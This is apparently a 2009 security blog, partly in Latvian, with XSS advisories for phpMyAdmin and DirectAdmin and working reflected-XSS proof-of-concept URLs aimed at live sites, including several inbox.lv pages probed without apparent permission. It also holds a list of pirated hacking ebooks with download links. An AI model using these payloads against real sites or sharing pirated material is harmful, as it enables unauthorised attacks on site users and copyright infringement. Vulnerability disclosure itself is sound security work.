###############################################
Vuln. discovered by : r0t
Date: 30 june 2009
vendorlink:http://www.phpmyadmin.net/
affected versions:
phpMyAdmin 3.2.0.1
phpMyAdmin 3.2.1-dev
phpMyAdmin 3.3.0-dev
phpMyAdmin 2.11.10-dev
phpMyAdmin 3.2.0-rc1
and another versions also can be affected
###############################################
Vuln. Description:
phpMyAdmin contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "db" paremeter in "index.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.
live PoC:
http://demo.phpmyadmin.net/MAINT_3_2_0/index.php?db=%22%3E%27%3E%3Cscript%3Ealert%28%2Fr0t%2F%29%3C%2Fscript%3E&token=f70d8ec4305c5a877f56c14554aced10
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
Ps.
By changing XSS test requests for popular products like phpMyAdmin vulns like XSS will never ends.To prove my words,just use XSS PoC request from live example by another parameters.
Tuesday, 30 June 2009
Monday, 29 June 2009
XSS ieksh SS.LV
Ka jau lielakai dalai Mekleshanas dzinejiem ir populara kibele ar XSS, tad ss.lv ar neko ipashi neatshkkiras.
Mekleshana:
r0t://www.ss.lv/lv/transport/cars/search/
parametrs "Cena": ar savam divam ailem "Min" un "Max" ir vieta kur ir ticis nohalturets.
Hackers Library
* Ebook - Computer) Hacking The Windows Registry.pdf
* (eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf
* (eBook pdf) Hacking into computer systems - a beginners guide.pdf
* (ebook_-_pdf)_Hacking_IIS_Servers.pdf
* A Beginners Guide To Hacking Computer Systems.pdf
* amazon-hacks.chm
* Attacking the DNS Protocol.pdf
* Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006.pdf
* bsd-hacks.pdf
* Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
* Computer - Hackers Secrets - e-book.pdf
* cracking-sql-passwords.pdf
* Crc Press - The Hacker'S Handbook.pdf
* Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru].pdf
* DangerousGoogle-SearchingForSecrets.pdf
* database hacker handbook.chm
* Dummies - Hack How To Create Keygens (1).pdf
* ebay-hacks-100-industrial-strength-tips-and-tools.pdf
* eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
* ethical hacking, student guide.pdf
* excel-hacks.chm
* google-hacks.pdf
* Guide-to-Hacking-with-sub7 (1).doc
* Hack IT Security Through Penetration Testing.pdf
* Hack Proofing - Your Network - Internet Tradecraft.pdf
* Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress - ISBN 1-928994-34-2.pdf
* Hack Proofing Sun Solaris 8.pdf
* Hack Proofing Your E-Commerce Site.pdf
* Hack Proofing Your Identity In The Information Age.pdf
* Hack Proofing Your Network Second Edition.pdf
* Hack Proofing Your Network_First Edition.pdf
* Hack Proofing Your Web Applications.pdf
* Hacker Disassembling Uncovered.chm
* hacker ethic.pdf
* Hacker Linux Uncovered.chm
* Hacker Web Exploitation Uncovered.chm
* Hacker'S.Delight.chm
* Hackers Beware.pdf
* Hackers Secrets Revealed.pdf
* Hackers Secrets.pdf
* Hackers, Heroes Of The Computer Revolution.pdf
* Hackers_Secrets.pdf
* Hacker_s_Guide.pdf
* Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
* Hacking - The Art of Exploitation.chm
* Hacking Cisco Routers.pdf
* Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
* Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
* Hacking For Dummies 1.pdf
* Hacking For Dummies 2.pdf
* Hacking For Dummies.pdf
* Hacking GMail.pdf
* Hacking IIS Servers.pdf
* Hacking into computer systems - a beginners guide.pdf
* hacking the windows registry .pdf
* Hacking Windows XP.pdf
* Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
* Hacking-Hacker's Guide.pdf
* Hacking-Hackers Secrets Revealed.pdf
* Hacking-Hugo Cornwall-The Hacker's Handbook .pdf
* Hacking-The Hacker Crackdown.pdf
* Hacking.For.Dummies.Access.To.Other.People's.Syste m.Made.Simple.pdf
* Hacking.Guide.V3.1.pdf
* Hacking.nfo
* Hacking.sfv
* Hackproofing Oracle Application Server.pdf
* Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit.
* chm
* Hack_IT_Security_Through_Penetration_Testing.chm
* haking.txt
* Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity.chm
* How to Crack CD Protections.pdf
* John Wiley & Sons - Hacking For Dummies.pdf
* John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU.pdf
* linux-server-hacks.pdf
* little_black_book_oc_computer_viruses.pdf
* mac-os-hacks.chm
* McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
* McGraw.Hacking.Exposed.Cisco.Networks.chm
* McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB.pdf
* McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-.pdf
* McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB.pdf
* Mind Hacks - Tips & Tricks for Using Your Brain.chm
* network-security-hacks.chm
* No.Starch.Press.Hacking.The.Art.Of.Exploitation.ch m
* O'Reilly - Online Investing Hacks.chm
* O'Reilly.-.Network.Security.Hacks.chm
* O'Reilly.Windows.Server.Hack.chm
* O'Reilly.Windows.Server.Hack.rar
* online-investing-hacks.chm
* OReilly Google Hacks, 1st Edition2003.pdf
* OReilly - Google Hacks.pdf
* Oreilly, Paypal Hacks (2004) Ddu.chm
* OReilly,.IRC.Hacks.(2004).DDU.chm
* OReilly.SQL.Hacks.Nov.2006.chm
* OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Coursewar
* e.eBook-LiB.chm
* O_Reilly_-_Windows_XP_Hacks.chm
* PC Games - How to Crack CD Protection.pdf
* Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
* SoTayHacker1.0.chm
* spidering-hacks.chm
* SQL Hacks.chm
* SQLInjectionWhitePaper.pdf
* Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
* Syngress -- Hack Proofing Your Wireless Network.pdf
* Syngress Hack Proofing Your Identity in the Information Age.pdf
* Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
* Syngress.Hack.the.Stack.Oct.2006.pdf
* The Little Black Book Of Computer Virus.pdf
* The_20Little_20Black_20Book_20of_20Computer_20Viru ses.pdf
* tivo-hacks.100-industrial-strength-tips-and-tools.pdf
* u23_Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
* Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers.chm
* Win XP Hacks oreilly 2003.chm
* Windows Server Hacks.chm
* WinXP SP1 Hack.pdf
* Xbox-hack - AIM-2002-008.pdf
* Yahoo.Hacks.Oct.2005.chm
Download from Rapidshare:
r0t://rapidshare.com/files/82425846/Hacking.part01.rar
r0t://rapidshare.com/files/82442869/Hacking.part02.rar
r0t://rapidshare.com/files/82427993/Hacking.part02.rar
r0t://rapidshare.com/files/82445546/Hacking.part03.rar
r0t://rapidshare.com/files/82430177/Hacking.part03.rar
r0t://rapidshare.com/files/82432614/Hacking.part04.rar
r0t://rapidshare.com/files/82448319/Hacking.part04.rar
r0t://rapidshare.com/files/82451101/Hacking.part05.rar
r0t://rapidshare.com/files/82454225/Hacking.part06.rar
r0t://rapidshare.com/files/82457503/Hacking.part07.rar
r0t://rapidshare.com/files/82460913/Hacking.part08.rar
r0t://rapidshare.com/files/82464586/Hacking.part09.rar
r0t://rapidshare.com/files/82468340/Hacking.part10.rar
r0t://rapidshare.com/files/82471881/Hacking.part11.rar
r0t://rapidshare.com/files/82473464/Hacking.part12.rar
if download dont works 4 u , change/replace "r0t" to "http".
RTFM ;]
* (eBook - PDF) Hugo Cornwall - The Hacker's Handbook .pdf
* (eBook pdf) Hacking into computer systems - a beginners guide.pdf
* (ebook_-_pdf)_Hacking_IIS_Servers.pdf
* A Beginners Guide To Hacking Computer Systems.pdf
* amazon-hacks.chm
* Attacking the DNS Protocol.pdf
* Auerbach.Practical.Hacking.Techniques.and.Counterm easures.Nov.2006.pdf
* bsd-hacks.pdf
* Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
* Computer - Hackers Secrets - e-book.pdf
* cracking-sql-passwords.pdf
* Crc Press - The Hacker'S Handbook.pdf
* Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.[223.kB_www.netz.ru].pdf
* DangerousGoogle-SearchingForSecrets.pdf
* database hacker handbook.chm
* Dummies - Hack How To Create Keygens (1).pdf
* ebay-hacks-100-industrial-strength-tips-and-tools.pdf
* eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
* ethical hacking, student guide.pdf
* excel-hacks.chm
* google-hacks.pdf
* Guide-to-Hacking-with-sub7 (1).doc
* Hack IT Security Through Penetration Testing.pdf
* Hack Proofing - Your Network - Internet Tradecraft.pdf
* Hack Proofing Linux A Guide to Open Source Security - Stangler, Lane - Syngress - ISBN 1-928994-34-2.pdf
* Hack Proofing Sun Solaris 8.pdf
* Hack Proofing Your E-Commerce Site.pdf
* Hack Proofing Your Identity In The Information Age.pdf
* Hack Proofing Your Network Second Edition.pdf
* Hack Proofing Your Network_First Edition.pdf
* Hack Proofing Your Web Applications.pdf
* Hacker Disassembling Uncovered.chm
* hacker ethic.pdf
* Hacker Linux Uncovered.chm
* Hacker Web Exploitation Uncovered.chm
* Hacker'S.Delight.chm
* Hackers Beware.pdf
* Hackers Secrets Revealed.pdf
* Hackers Secrets.pdf
* Hackers, Heroes Of The Computer Revolution.pdf
* Hackers_Secrets.pdf
* Hacker_s_Guide.pdf
* Hacking - Firewalls And Networks How To Hack Into Remote Computers.pdf
* Hacking - The Art of Exploitation.chm
* Hacking Cisco Routers.pdf
* Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition.pdf
* Hacking Exposed Network Security Secrets & Solutions, Third Edition ch1.pdf
* Hacking For Dummies 1.pdf
* Hacking For Dummies 2.pdf
* Hacking For Dummies.pdf
* Hacking GMail.pdf
* Hacking IIS Servers.pdf
* Hacking into computer systems - a beginners guide.pdf
* hacking the windows registry .pdf
* Hacking Windows XP.pdf
* Hacking-ebook - CIA-Book-of-Dirty-Tricks1.pdf
* Hacking-Hacker's Guide.pdf
* Hacking-Hackers Secrets Revealed.pdf
* Hacking-Hugo Cornwall-The Hacker's Handbook .pdf
* Hacking-The Hacker Crackdown.pdf
* Hacking.For.Dummies.Access.To.Other.People's.Syste m.Made.Simple.pdf
* Hacking.Guide.V3.1.pdf
* Hacking.nfo
* Hacking.sfv
* Hackproofing Oracle Application Server.pdf
* Hack_Attacks_Revealed_A_Complete_Reference_With_Cu stom_Security_Hacking_Toolkit.
* chm
* Hack_IT_Security_Through_Penetration_Testing.chm
* haking.txt
* Halting.The.Hacker.A.Practical.Guide.To.Computer.S ecurity.chm
* How to Crack CD Protections.pdf
* John Wiley & Sons - Hacking For Dummies.pdf
* John.Wiley.and.Sons.Hacking.Windows.XP.Jul.2004.eB ook-DDU.pdf
* linux-server-hacks.pdf
* little_black_book_oc_computer_viruses.pdf
* mac-os-hacks.chm
* McGraw-Hill - Hacking Exposed, 3rd Ed - Hacking Exposed Win2.pdf
* McGraw.Hacking.Exposed.Cisco.Networks.chm
* McGraw.Hill.HackNotes.Network.Security.Portable.Re ference.eB.pdf
* McGraw.Hill.HackNotes.Web.Security.Portable.Refere nce.eBook-.pdf
* McGraw.Hill.HackNotes.Windows.Security.Portable.Re ference.eB.pdf
* Mind Hacks - Tips & Tricks for Using Your Brain.chm
* network-security-hacks.chm
* No.Starch.Press.Hacking.The.Art.Of.Exploitation.ch m
* O'Reilly - Online Investing Hacks.chm
* O'Reilly.-.Network.Security.Hacks.chm
* O'Reilly.Windows.Server.Hack.chm
* O'Reilly.Windows.Server.Hack.rar
* online-investing-hacks.chm
* OReilly Google Hacks, 1st Edition2003.pdf
* OReilly - Google Hacks.pdf
* Oreilly, Paypal Hacks (2004) Ddu.chm
* OReilly,.IRC.Hacks.(2004).DDU.chm
* OReilly.SQL.Hacks.Nov.2006.chm
* OSB.Ethical.Hacking.and.Countermeasures.EC.Council .Exam.312.50.Student.Coursewar
* e.eBook-LiB.chm
* O_Reilly_-_Windows_XP_Hacks.chm
* PC Games - How to Crack CD Protection.pdf
* Security and Hacking - Anti-Hacker Tool Kit Second Edition.chm
* SoTayHacker1.0.chm
* spidering-hacks.chm
* SQL Hacks.chm
* SQLInjectionWhitePaper.pdf
* Syngress - Hacking a Terror Network. The Silent Threat of Covert Channels.pdf
* Syngress -- Hack Proofing Your Wireless Network.pdf
* Syngress Hack Proofing Your Identity in the Information Age.pdf
* Syngress.Buffer.Overflow.Attacks.Dec.2004.eBook-DDU.pdf
* Syngress.Hack.the.Stack.Oct.2006.pdf
* The Little Black Book Of Computer Virus.pdf
* The_20Little_20Black_20Book_20of_20Computer_20Viru ses.pdf
* tivo-hacks.100-industrial-strength-tips-and-tools.pdf
* u23_Wiley - Hacking GPS - 2005 - (By Laxxuss).pdf
* Wiley.The.Database.Hackers.Handbook.Defending.Data base.Servers.chm
* Win XP Hacks oreilly 2003.chm
* Windows Server Hacks.chm
* WinXP SP1 Hack.pdf
* Xbox-hack - AIM-2002-008.pdf
* Yahoo.Hacks.Oct.2005.chm
Download from Rapidshare:
r0t://rapidshare.com/files/82425846/Hacking.part01.rar
r0t://rapidshare.com/files/82442869/Hacking.part02.rar
r0t://rapidshare.com/files/82427993/Hacking.part02.rar
r0t://rapidshare.com/files/82445546/Hacking.part03.rar
r0t://rapidshare.com/files/82430177/Hacking.part03.rar
r0t://rapidshare.com/files/82432614/Hacking.part04.rar
r0t://rapidshare.com/files/82448319/Hacking.part04.rar
r0t://rapidshare.com/files/82451101/Hacking.part05.rar
r0t://rapidshare.com/files/82454225/Hacking.part06.rar
r0t://rapidshare.com/files/82457503/Hacking.part07.rar
r0t://rapidshare.com/files/82460913/Hacking.part08.rar
r0t://rapidshare.com/files/82464586/Hacking.part09.rar
r0t://rapidshare.com/files/82468340/Hacking.part10.rar
r0t://rapidshare.com/files/82471881/Hacking.part11.rar
r0t://rapidshare.com/files/82473464/Hacking.part12.rar
if download dont works 4 u , change/replace "r0t" to "http".
RTFM ;]
Thursday, 25 June 2009
Iznakusi BackTrack 4 Pre Release
Ligi, ligo, veljorpojam laikam manas asinis ir vairak alus neka asinis.
Bet nepar iet runa , runa ies par Backtrack 4 kuram nupat iznakusi ir "Pre Release".
Ta ka kursh nevar nociesties un sagaidit Final relizi, tad velkam sheit.Ja salidzinasim ar Backtrack 4 beta, tad svars ir manami pieaudzis no 854mb uz 1390mb, te jau lielu lomu tas vairs nespele, ja Backtrack tresho vareja dabut virsu uz CD matricas, tad te veel uz DVD paliks daudz brivas vietas:)
Tapatas* var paluureet Introduction Video vai palasit .PDF par to kas jauns lacitim vedera.
Bet nepar iet runa , runa ies par Backtrack 4 kuram nupat iznakusi ir "Pre Release".
Ta ka kursh nevar nociesties un sagaidit Final relizi, tad velkam sheit.Ja salidzinasim ar Backtrack 4 beta, tad svars ir manami pieaudzis no 854mb uz 1390mb, te jau lielu lomu tas vairs nespele, ja Backtrack tresho vareja dabut virsu uz CD matricas, tad te veel uz DVD paliks daudz brivas vietas:)
Tapatas* var paluureet Introduction Video vai palasit .PDF par to kas jauns lacitim vedera.
Saturday, 20 June 2009
SS.lv Zirgu stallis
Iegaju ka tiko ss.lv apskatities sludinajumus un mans AntiVir sak brekt par malware ieksh javascript , kad veras pats sludinajuma logs valja .Vai nu kads zikkeris paspejis ielikt , bez zinjas vai ss.lv piepelnaas:) Kriize , kriize..
PS. protams ka ar FF kluse , jo tendets tieshi prieksh IE.
Te ir viens no failiem:
h**p://i.ss.lv/w_inc/decoder.js
SATURS
iemetot ieksh virustotal.com shadi rezultati iznaca mums.
no 41 av 2 nobrecas:
AntiVir 7.9.0.19 HEUR/HTML.Malware
McAfee-GW-Edition 6.7.6 Heuristic.HTML.Malware
Anti XSS ieksh inbox.lv
Inbox.lv pats nelietoju, tapeec vareetu teikt ,ka pat nezinaju , kaads tas zveers izskataas. Nejaushi uzduros Googlej0t uz viena bloga, kur itka publicejas:
"Jul 2001–Feb 2007: Chief Developer at Inbox.lv, largest Latvian Internet portal, proud to say it moved from #4 to #1 in terms of weekly unique visitors since I joined the company." jeb vienkarshi Viktors Rotanovs.
Labi , protams rodas iespaids Chief Developer iespejams ka mega labs , par vinja pro neshaubos nemirkli un rekur vel pamaciba bloga par Anti-XSS , tad jau itka visam inbox.lv vajadzetu buut kaartiibaa , ieshu ka es paluukoshos.
Es biju mazliet parsteigts, ka lielako ties tam mega portalam nekas pashu rokam nav rakstits*, pa bazi njemti gatavi mazliet modificeti, ka piem pats pasts tiraka Horde,tie amigos ir viens no MySpace kloniem kuri metajas tiimeklii.
Tad par XSS, uzmetu aci ipashi nechenshoties pat testa pieprasijumu nemainot atradu paariiti.Isak sakot es domaju ka tas viss ir paradijies peec 2007-ta jo Viktors to nebutu pielavis..:)
Amigos, jeb MySpace klons
MySpace Klons
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522&from=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
ps. index vieta admin un esam , pie sprices:)
http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(111);%3C/script%3E.html
http://smart.inbox.lv/?logout=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=15420&rnd=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
Ja ticet readme.html failam kas metajas tur, tad WP versija ir 1.5:)
http://company.inbox.lv/news/readme.html
PS.Jau ieprieks atvainojos par sagadatam neertibam, ne pret Viktoru ne pret inbox.lv kolektivu nav man nekadas pretenzijas, es tikai garam ejot ,lai paskatitos ,ka jums iet.
"Jul 2001–Feb 2007: Chief Developer at Inbox.lv, largest Latvian Internet portal, proud to say it moved from #4 to #1 in terms of weekly unique visitors since I joined the company." jeb vienkarshi Viktors Rotanovs.
Labi , protams rodas iespaids Chief Developer iespejams ka mega labs , par vinja pro neshaubos nemirkli un rekur vel pamaciba bloga par Anti-XSS , tad jau itka visam inbox.lv vajadzetu buut kaartiibaa , ieshu ka es paluukoshos.
Es biju mazliet parsteigts, ka lielako ties tam mega portalam nekas pashu rokam nav rakstits*, pa bazi njemti gatavi mazliet modificeti, ka piem pats pasts tiraka Horde,tie amigos ir viens no MySpace kloniem kuri metajas tiimeklii.
Tad par XSS, uzmetu aci ipashi nechenshoties pat testa pieprasijumu nemainot atradu paariiti.Isak sakot es domaju ka tas viss ir paradijies peec 2007-ta jo Viktors to nebutu pielavis..:)
Amigos, jeb MySpace klons
MySpace Klons
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522&from=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1&id=155522%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://amigos.inbox.lv/index.php?mode=report_spam&cat=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
ps. index vieta admin un esam , pie sprices:)
http://work.inbox.lv/darbs/o-%22%3E%3Cscript%3Ealert(111);%3C/script%3E.html
http://smart.inbox.lv/?logout=1%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=15420&rnd=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
http://smart.inbox.lv/cr_game/index.php?game_id=%22%3E%3Cscript%3Ealert(111);%3C/script%3E
Ja ticet readme.html failam kas metajas tur, tad WP versija ir 1.5:)
http://company.inbox.lv/news/readme.html
PS.Jau ieprieks atvainojos par sagadatam neertibam, ne pret Viktoru ne pret inbox.lv kolektivu nav man nekadas pretenzijas, es tikai garam ejot ,lai paskatitos ,ka jums iet.
Friday, 19 June 2009
DirectAdmin <= v1.33.6 XSS vuln.
###############################################
Vuln. discovered by : r0t
Date: 19 June 2009
vendor:http://www.directadmin.com/
affected versions:v1.33.6 and other
versions also can be affected.
###############################################
DirectAdmin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "view" parameter in "CMD_REDIRECT" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
##############################################
live PoC:
http://www.directadmin.com:2222/CMD_REDIRECT?view=
advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=demo.com
PS.
need to login:
demo_user:demo
###############################################
Solution:
Filter malicious characters and character sequences in a web proxy.
###############################################
Vuln. discovered by : r0t
Date: 19 June 2009
vendor:http://www.directadmin.com/
affected versions:v1.33.6 and other
versions also can be affected.
###############################################
DirectAdmin contains a flaw that allows a remote Cross-Site Scripting attacks.Input passed to the "view" parameter in "CMD_REDIRECT" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
##############################################
live PoC:
http://www.directadmin.com:2222/CMD_REDIRECT?view=
advanced&sort1%22%3E%3Cscript%3Ealert(111);%3C/script%3E=1&domain=demo.com
PS.
need to login:
demo_user:demo
###############################################
Solution:
Filter malicious characters and character sequences in a web proxy.
###############################################
Subscribe to:
Posts (Atom)
Posts
